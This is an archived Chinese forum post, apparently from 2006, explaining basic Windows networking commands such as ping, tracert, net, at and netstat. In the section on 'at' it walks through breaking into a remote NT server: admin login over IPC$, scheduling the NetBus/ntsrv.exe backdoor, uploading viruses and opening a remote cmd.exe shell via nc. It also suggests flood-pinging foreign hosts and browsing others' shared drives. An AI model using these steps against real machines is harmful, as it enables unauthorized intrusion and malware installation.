查看單個文章
舊 2006-04-30, 03:11 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 基礎網路指令

基礎網路指令

網路安全較有關係的幾個指令有:ping winipcfg tracert netat netstat
1. ping:這是TCP/IP傳輸協定中最有用的指令之一
它給另一個系統傳送一系列的資料包,該系統本身又發回一個回應,這條實用程序對搜尋遠端主機很有用,它返回的結果表示是否能到達主機,宿主機傳送一個返回資料包需要多長時間。

Usage: ping 〔-t〕〔-a〕〔-n count〕〔-l size〕〔-f〕〔-i TTL〕〔-v TOS〕〔-r
count〕〔-s count〕 〔〔-j host-list〕〔-k host-list〕〕〔-w timeout〕
destination-list
Options:
-t Ping the specifed host until interrupted.(除非人為中止,否則一直ping下去)
-a Resolve addresses to hostnames.(把IP轉為主機名)
-n count Number of echo requests to send.(回應請求的數量)
-l size Send buffer size.(封包的大小)
-f Set Don't Fragment flag in packet.(訊息包中無碎片)
-i TTL Time To Live.(時間)
-v TOS Type Of Service.(服務檔案類型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along
host-list.(較嚴格的…唉,怎麼譯好…算了,放著吧)
-w timeout Timeout in milliseconds to wait for each
reply.(timeout的時間)
比如大家可能都知道的一個指令 # ping -f -s 65000
***.***.***.***或者前階段大家所謂ping死霉國佬時所用的指令(當然這樣只會造成我方自己的網路阻塞)。其實這個指令主要是用來看對方回應的速度,如果怎麼ping
得到的結果都是request time out。那恐怕你根本就不用你去找這台主機了,它不在你的射程之內。
2. winipcfg:
這是用來看自己IP位址的小工具,win98原有的,NT裡則網路監視器裡就能看到IP了,還有個小實用程序叫……好像是叫IPCONFIG吧,沒怎麼用,都快忘了……這種東東網上其實相當之多,但既然「原有的」,又何須外求,何況網上下載的黑客的東東裡有沒有特洛伊猶未可知,再說了,如果你不是在自己的「愛姬」上執行,豈不是就沒法幹活?——哈,不好意思,跑題了,但——接著跑兩句:可以把一些常用的、傳統的工具上傳到網上,當作一個制作備份,什麼時候在網咖、某家公司要幹活的話,直接下載就是一個完整無缺的工具包了。這個東東相當簡單,直接在DOS下按鍵輸入指令就是了,沒有什麼參數。

3. tracert:是驗證通往遠端主機路徑的實用程序
用法: tracert 〔-d〕 〔-h maximum_hops〕 〔-j host-list〕 〔-w timeout〕
target_name
參數:
-d Do not resolve addresses to hostnames.(不將IP轉為主機名)
-h maximum_hops Maximum number of hops to search for
target.(最大跟蹤數量)
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.(time out 的時間)
最簡單的用法就是 tracert hostname
其中hostname是電腦名稱或你想跟蹤其路徑的電腦的IP位址。TRACERT將返回資料包藉以到達最終目的地的各種IP位址,你知道該怎麼利用它嗎?

我略為解釋一下吧:跟蹤通往210.142.192.130的路由,最大30:
第一行:*&^%&* 我就是從這裡出去的(哈,真不想說^&^)
第四行:是不是快要出國了呢?
第九行:呀!這是日本鬼子的地盤……
4. net:這可是個非常棒的東西,如果不會用的話,趕緊睜大眼睛噢
這個指令的語法是: 可用的指令包括:
NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW
NET HELP SERVICES 列出用戶可以啟動的網路服務。
NET HELP SYNTAX 解釋如何閱讀 NET HELP 語法行。
NET HELP command MORE 用於逐屏顯示說明 。
我可就不逐樣解釋了——這樣會把我的手指累壞,就說說常用的兩個指令吧
a.net view
這個指令的語法是:NET VIEW 〔computername /DOMAIN〔:domainname〕〕
NET VIEW /NETWORK:NW 〔computername〕
NET VIEW 用於顯示一個電腦上共享資源的列表。當不帶選項使用本指令時,
它就會顯示當前域或網路上的電腦上的列表。
computername 指用戶希望瀏覽其共享資源的電腦。
/DOMAIN:domainname 指定用戶希望瀏覽有效的電腦所在的域。如果省略了域名,就會顯示區域網路絡上的所有域。
/NETWORK:NW 顯示 NetWare 網路上所有可用的伺服器。如果指定了一個電腦名稱,就會顯示NetWare
網路中那個電腦上的可用資源。
至於舉例嘛,比如你知道一個遠端電腦***.***.**.***上有開資源共享,那麼執行 net view
***.***.**.*** 就可以了
b.net use
這個指令的語法是:NET USE 〔devicename *〕 〔computernamesharename〔volume〕
〔password *〕〕
〔/USER:〔domainname〕username〕
〔〔/DELETE〕 〔/PERSISTENT:{YES NO}〕〕
NET USE 〔devicename *〕 〔password *〕〕 〔/HOME〕
NET USE 〔/PERSISTENT:{YES NO}〕
NET USE 用於將電腦與共享的資源相連接,或者切斷電腦與共享資源的
連接。當不帶選項使用本指令時,它會列出電腦的連接。
devicename 指定一個名字以便與資源相連接,或者指定要切斷的設備。有兩種檔案類型的設備名:磁碟機 (D: 至 Z:)
和列印機 (LPT1: 至 LPT3:)。輸入一個星號來替代一個指定的設備名可以分配下一個可用設備名。
computername 指控制共享資源的電腦的名字。如果電腦名稱中包含有空字元,
就要將雙反斜線 () 和電腦名稱一起用引號 (" ")括起來。電腦名稱
可以有1 到15 個 字元。
sharename 指共享資源的網路名字。
volume 指定一個伺服器上的 NetWare 磁碟區。用戶必須安裝 Netware 的客戶服務(Windows NT 工作站) 或者
Netware 的網路閘道服務 (Windows NT 伺服器) 並使之與NetWare 伺服器相連。
password 指訪問共享資源所需要的密碼。
* 進行密碼提示。當在密碼提示號下輸入密碼時,密碼是不會顯示的。
/USER 指定連接時的一個不同的用戶名。
domainname 指定另外一個域。如果預設域,就會使用當前登入的域。
username 指定登入的用戶名。
/HOME 將用戶與他們的宿主目錄相連。
/DELETE 取消一個網路連接,並且從永久連接列表中移除該連接。
/PERSISTENT 控制對永久網路連接的使用。其預設值是最近使用的設定。
YES 在連接產生時儲存它們,並在下次登入時恢復它們。
NO 不儲存正在產生的連接或後續的連接;現有的連接將在下次登入時被恢復。可以使用 /DELETE 選項開關來移除永久連接。
PS:前兩天在綠色兵團的帖子裡見到一位仁兄的話,與這個指令有異曲共工之妙,也說明一個大概:在瀏覽器中輸入
file:///***.***.**.***c¥
則網上共享的C碟內容就會顯示出來了,就彷彿用瀏覽器上FTP站點看到的一樣。各位不妨試試,還可試試舉一反三……
5.at: 排定在特定的日期和時間執行某些指令和程序。
執行 AT 指令之前必須先啟動 Schedule
服務。瞧,現炒就得現賣,剛學了net指令,但這個start指令我可沒詳述,自已看看求助文件,摸索一下各種指令的用法吧。
C:》net start schedule
Schedule 正在啟動服務.....
Schedulw 服務啟動成功。
AT 〔computername〕 〔 〔id〕 〔/DELETE〕 /DELETE 〔/YES〕〕
AT 〔computername〕 time 〔/INTERACTIVE〕
〔 /EVERY:date〔,...〕 /NEXT:date〔,...〕〕 "command"
computername 指定遠端電腦。 如果省略這個參數
指令會被排定在本地機上執行。
id 指定給排定進度指令的識別號。
/delete 移除某個已排定進度的指令。如果省略標幟,電腦上所有已排定進度的指令都會被移除。
/yes 用於移除所有作業,且不想在執行移除時顯示驗證訊息 。
time 指定指令執行的時間。
/interactive 允許作業在執行時,與用戶通過桌面交互。
/every:date〔,...〕 指定在每週或每月的某日 (或某幾日) 執行指令。如果省略日期,則預設為在每月的本日執行。
/next:date〔,...〕 指定在下一個指定日期 (如,下週三),執行指令。如果省略日期,則預設為在每月的本日執行。
"command" 準備執行的 Windows NT 指令或批次處理文件。
知道了如何使用AT,再來看看如何在遠端NT上執行ntsrv.exe:
1 利用管理員登入到目的伺服器,方法為: net use x.x.x.xipc¥ "adminpwd"
/user:"adminuser"(這裡具體方法可參見KILLUSA的文章《HOW TO GET IN NT》)
2 利用ntsrv.exe啟動遠端: netsvc x.x.x.x schedule /start
3 利用AT.EXE在遠端伺服器設定程序定時執行,當然最快執行最理想,所以,你可以用letmein.exe得到伺服器的時間,然後:
at x.x.x.x 00:00 ntsrv.exe
/port:64321其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會後,再在本機啟動netbus.exe,按鍵輸入目的伺服器得ip位址或hostname,連接!比如第一種方法,你想要在目的伺服器執行諸如病毒之類的東東,可以利用netbus得上傳功能,將各種「大補丸」上傳至目的伺服器,再用netbus的"Start
program",按鍵輸入完整路徑,就ok了!第二種方法是利用netbus的「App
redirect」功能,啟動遠端telnet服務,如下:在netbus中擊「App
redirect」,按鍵輸入"C:》winntsystem32cmd.exe",Port為:4321,服務就啟動了,然後在本機執行:nc
x.x.x.x 4321,出現dos啟動的畫面就表示連接成功:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:》

6.netstat 這是一個觀察網路連接狀態的實用工具。
它能檢驗IP的當前連接狀態,在斷定你的基本級通信正在進行後,就要驗證系統上的服務。這個服務包括檢查正在收聽輸入的通信量和/或驗證你正在新增一個與遠端站點的會話,它可以很輕鬆地做到這一點。網上也可以看到很多如X-netstat之類的工具,是WIN介面的,更加直觀而已,並沒有多什麼功能,這個指令的具體用法如下:

Displays protocol statistics and current TCP/IP network
connections.(顯示傳輸協定與當前網路連接)
NETSTAT 〔-a〕 〔-e〕 〔-n〕 〔-s〕 〔-p proto〕 〔-r〕 〔interval〕
-a Displays all connections and listening ports.(顯示所有連接和監聽連接阜)
-e Displays Ethernet statistics. This may be combined with the -s
option.(顯示以太連接,可以與-s連用)
-n Displays addresses and port numbers in numeri
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次